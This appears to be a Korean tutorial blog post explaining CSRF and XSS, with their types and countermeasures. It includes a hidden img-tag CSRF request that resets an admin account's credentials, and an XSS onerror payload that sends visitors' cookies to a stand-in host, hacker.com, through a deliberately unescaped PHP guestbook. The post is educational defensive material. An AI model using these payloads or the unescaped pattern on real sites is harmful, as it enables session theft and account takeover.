[Web] CSRF & XSS

Juhye Pyoun·2023년 8월 29일
web
0

Web

목록 보기
12/12

CSRF

Cross Site Request Forgery
웹사이트 취약점 공격의 하나로, 사용자가 자신의 의지와는 무관하게 공격자가 의도한 행위(수정, 삭제, 등록 등)를 특정 웹사이트에 요청하게 하는 공격

사용자가 웹사이트에 로그인한 상태에서 사이트간 요청 위조 공격 코드가 삽입된 페이지를 열면 공격 대상이 되는 웹사이트는 위조된 공격 명령이 믿을 수 있는 사용자로부터 발송된 것으로 판단하게 되어 공격에 노출된다

CSRF 공격은 다음과 같은 조건을 만족할 때 이루어진다

  • 사용자가 해커가 만든 피싱 사이트에 접속
  • 위조 요청을 전송하는 서비스에 사용자가 로그인

 

예시

옥션 사건을 예로 들면,

  1. 옥션 관리자 중 한명이 관리 권한을 가지고 회사내에서 작업을 하던 중 메일을 조회한다.

  2. 해커는 다음과 같이 img 태그가 들어간 코드가 담긴 이메일을 보낸다. 관리자는 이미지 크기가 0이므로 코드를 보지 않는 이상 전혀 알지 못한다.

<img src="http://auction.com/changeUserAccount?id=admin&password=admin" width="0" height="0"/>

  1. 관리자가 이메일을 열람할 경우 이미지 파일을 받아오기 위해 URL이 열린다.

  2. 해커가 원하는 대로 관리자의 계정이 id와 pw 모두 admin인 계정으로 변경된다.

 

대응 기법

  • Referrer(요청 전송 페이지) 검증
    백엔드 단에서 Refferer 검증을 통해 승인된 도메인으로 요청시에만 처리

  • Security Token(CSRF Token) 사용
    사용자의 세션에 임의의 난수 값을 저장하고, 사용자의 요청시 해당 값을 포함하여 전송
    서버에서 요청을 받을 때 세션에 저장된 토큰값과 요청 파라미터로 전달받는 토큰 값이 일치하는 지 검증

 

XSS

Cross Site Scripting
웹사이트 취약점의 하나로, 웹사이트 관리자가 아닌 권한이 없는 이가 웹 페이지에 악성 스크립트를 삽입하는 공격

웹 애플리케이션이 사용자로부터 입력 받은 값을 제대로 검사하지 않고 사용할 경우 나타난다
이 취약점으로 해커가 사용자의 정보(쿠키, 세션 등)를 탈취하거나, 자동으로 비정상적인 기능을 수행하게 할 수 있다

 

공격 종류

  • 지속성 : 지속적으로 피해를 입히는 유형

  • 반사형 : 사용자에게 입력 받은 값을 서버에서 되돌려 주는 곳에서 발생

  • DOM 기반 : 악성 스크립트가 포함된 URL을 사용자가 요청하게 되면서 브라우저를 해석하는 단계에서 발생하는 공격

 

예시

다음과 같이 사용자가 입력한 내용을 출력하는 방명록 프로그램이 있다고 하자.

<p><?php echo htmlspecialchars($name); ?>님의 말: </p>
<?php echo $content; ?>

만약 $name이 "Hacker"이고 $content가 다음과 같다고 하면,

<p>Hello! I am a hacker.</p>
<img src="#" width="0" height="0" onerror="this.src='http://hacker.com/gatherCookie.php?
cookie='+encodeURIComponent(document.cookie);" />

결과 코드는 다음과 같이 되고,

<p>Hacker님의 말: </p>
<p>Hello! I am a hacker.</p>
<img src="#" width="0" height="0" onerror="this.src='http://hacker.com/gatherCookie.php?
cookie='+encodeURIComponent(document.cookie);" />

결과적으로 방명록을 보는 사람의 쿠키가 해커에게 전송된다.

 

대응 기법

  • 입출력 값 검증
    XSS Cheat Sheet에 대한 필터 목록을 만들어 모든 Cheat Sheet에 대한 대응을 가능하도록 사전에 대비

  • XSS 방어 라이브러리, 확장앱
    Anti XSS 라이브러리를 서버단에서 추가, 사용자들은 각자 브라우저에서 악성 스크립트가 실행되지 않도록 확장앱을 설치하여 방어

  • 웹 방화벽
    웹 공격에 특화된 것으로, 다양한 Injection을 한꺼번에 방어 가능

  • CORS, SOP 설정
    CORS(Cross-Origin Resource Sharing), SOP(Same-Origin-Policy)를 통해 사전에 지정된 도메인이나 범위가 아니라면 리소스를 가져올 수 없게 제한

 


[참고자료]

링크1🔗
링크2🔗
링크3🔗
링크4🔗

profile
Juhye Pyoun
이전 포스트

[Web] UI와 UX

0개의 댓글

관련 채용 정보